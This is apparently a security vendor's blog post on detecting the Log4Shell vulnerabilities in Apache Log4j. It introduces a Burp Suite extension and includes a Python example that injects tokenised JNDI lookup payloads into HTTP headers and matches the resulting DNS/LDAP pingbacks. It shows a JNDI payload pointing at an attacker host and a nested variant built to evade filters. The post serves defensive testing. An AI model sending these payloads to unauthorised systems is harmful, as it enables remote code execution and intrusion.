
December 17, 2021 Rob Jepson

Detecting Log4Shell vulnerabilities

Log4j vulnerability - CVE-2021-44228


An easily exploitable, critical-impact remote code execution vulnerability (CVE-2021-44228, widely known as Log4Shell) has been disclosed in Apache Log4j 2, the logging library used throughout the Java ecosystem. Versions 2.0-beta9 through 2.14.1 are affected: when a logged string contains a JNDI lookup such as ${jndi:ldap://attacker-host/a}, log4j resolves it, fetching and executing attacker-supplied code. Because log4j is so often pulled in as a transitive dependency, estimates at the time of writing put the share of affected Java applications at around 80%.

Successful exploitation gives an attacker code execution as the user running the Java process, compromising the application and the underlying server along with any data either of them can reach.

A second vulnerability, CVE-2021-45046, has since been identified by security researchers: the fix shipped in log4j 2.15.0 is incomplete, and in certain non-default configurations (where the logging pattern includes a Thread Context lookup such as ${ctx:loginId}) attacker-controlled input can still trigger a JNDI lookup. Services running any log4j 2.x release up to and including 2.15.0 (Java 8) or 2.12.1 (Java 7) should therefore be treated as vulnerable; the fixed releases are 2.16.0 and 2.12.2 respectively.

Claranet Security's Continuous Security Testing (CST) team have been dynamically testing for this vulnerability across all client scopes as a matter of priority, but due to the wide-reaching critical nature of this vulnerability we have decided to release our internal tool Log4Shell-Everywhere to assist testers with semi-passive black-box detection.

Detection

Black Box Detection - Log4Shell Everywhere

Log4Shell-Everywhere is a Burp Suite extension that edits proxied traffic on the fly, inserting Log4Shell test payloads into headers and parameters that are commonly logged, and alerts when a payload triggers an out-of-band pingback. It is a fast and efficient way of detecting whether an application is affected by Log4Shell, and includes logic that avoids false-positive pingback interactions.

https://github.com/claranet-cybersecurity/Log4Shell-Everywhere

To use the plugin, a Burp Professional licence is required. To install it, either build from source or install it from the BApp Store under the 'Extender' tab. Once loaded, the extension adds headers containing benign Log4Shell test strings (they only cause a lookup of a host you control, nothing is served back) to all in-scope traffic, including tests for the patch-bypass vulnerability CVE-2021-45046. Because every in-scope request is modified, define the Burp target scope carefully before enabling it.
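The detection pattern described above (tokenised payloads per injection point, then attributing each pingback to the exact request and header that caused it, discarding anything you did not send) is worth seeing in code. The following is an added example written for this page, not code from the Log4Shell-Everywhere plugin; it assumes a hypothetical out-of-band domain oob.example whose DNS/LDAP queries you log in a constructed line format, and a constructed list of headers to test.

```python
"""Pingback correlation for black-box Log4Shell testing (added example).

Assumptions: CALLBACK_DOMAIN is a domain whose DNS/LDAP queries you collect,
the collector only logs the query and never serves anything back, and its
log lines have the constructed format parsed by LOG_RE.
"""
from __future__ import annotations

import re
import secrets
from dataclasses import dataclass

CALLBACK_DOMAIN = "oob.example"  # assumption: your out-of-band collector's domain

# Constructed list of headers that Java web stacks often log verbatim.
INJECTION_HEADERS = ("User-Agent", "X-Forwarded-For", "Referer", "X-Api-Version")

# "plain" is the CVE-2021-44228 lookup; "nested" builds the same lookup from an
# inner ${lower:} lookup so a filter matching the literal text "jndi" misses it.
# Both only make a vulnerable target resolve {host}; the lookup is the signal.
PAYLOAD_TEMPLATES = {
    "plain": "${{jndi:ldap://{host}/a}}",
    "nested": "${{${{lower:j}}ndi:ldap://{host}/a}}",
}

# Constructed collector log line: "<timestamp> <DNS|LDAP> <queried name> from <source>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<proto>DNS|LDAP)\s+(?P<qname>\S+)\s+from\s+(?P<src>\S+)$")


@dataclass(frozen=True)
class Injection:
    """Where one payload went: which request, which header, which variant."""
    request_id: str
    header: str
    variant: str


class PingbackTracker:
    """Issues one unique token per injection point and maps pingbacks back to it."""

    def __init__(self, domain: str = CALLBACK_DOMAIN) -> None:
        self.domain = domain.lower()
        self._issued: dict[str, Injection] = {}

    def inject(self, request_id: str, headers: dict[str, str]) -> dict[str, str]:
        """Copy `headers`, appending a distinct tokenised payload per variant to each test header.

        The original value is kept so the request still looks normal to the application.
        """
        out = dict(headers)
        for header in INJECTION_HEADERS:
            payloads = []
            for variant, template in PAYLOAD_TEMPLATES.items():
                token = secrets.token_hex(6)  # 12 hex chars: a single valid DNS label
                self._issued[token] = Injection(request_id, header, variant)
                payloads.append(template.format(host=f"{token}.{self.domain}"))
            original = out.get(header)
            out[header] = " ".join(([original] if original else []) + payloads)
        return out

    def issued(self) -> dict[str, Injection]:
        return dict(self._issued)

    def correlate(self, log_lines: list[str]) -> dict[Injection, list[tuple[str, str, str]]]:
        """Map collector log lines back to the injection points that caused them.

        Lines that do not parse, are outside our domain, or carry a token we never
        issued (other scanners or resolvers probing the domain) are dropped, so a
        pingback is only ever reported against a payload we actually sent.
        """
        suffix = "." + self.domain
        hits: dict[Injection, list[tuple[str, str, str]]] = {}
        for line in log_lines:
            m = LOG_RE.match(line.strip())
            if not m:
                continue
            qname = m["qname"].lower().rstrip(".")
            if not qname.endswith(suffix):
                continue
            token = qname[: -len(suffix)].rsplit(".", 1)[-1]  # label just before our domain
            injection = self._issued.get(token)
            if injection is None:
                continue
            hits.setdefault(injection, []).append((m["ts"], m["proto"], m["src"]))
        return hits


def demo() -> dict[Injection, list[tuple[str, str, str]]]:
    """Stand-alone walk-through on constructed data."""
    tracker = PingbackTracker()
    tracker.inject("req-42", {"Host": "app.example", "User-Agent": "curl/7.79.1"})
    # Constructed collector output: the target resolved the plain User-Agent token
    # twice, and something unrelated queried a token that was never issued.
    ua_token = next(tok for tok, inj in tracker.issued().items()
                    if inj.header == "User-Agent" and inj.variant == "plain")
    lines = [
        f"2021-12-17T11:02:15Z DNS {ua_token}.oob.example from 203.0.113.7",
        f"2021-12-17T11:02:16Z LDAP {ua_token}.oob.example from 203.0.113.7",
        "2021-12-17T11:02:17Z DNS deadbeefcafe.oob.example from 198.51.100.9",
        "not a collector line",
    ]
    return tracker.correlate(lines)


if __name__ == "__main__":
    for injection, events in demo().items():
        print(f"VULNERABLE: {injection.request_id} via {injection.header} "
              f"({injection.variant}): {len(events)} pingback(s)")
```

One token per (request, header, variant) is what makes the result actionable: a hit tells you not just that the application is vulnerable but which request and which header reached log4j, which is what you need to reproduce and report it. Unknown tokens are deliberately thrown away rather than counted, since anyone can resolve names under your callback domain.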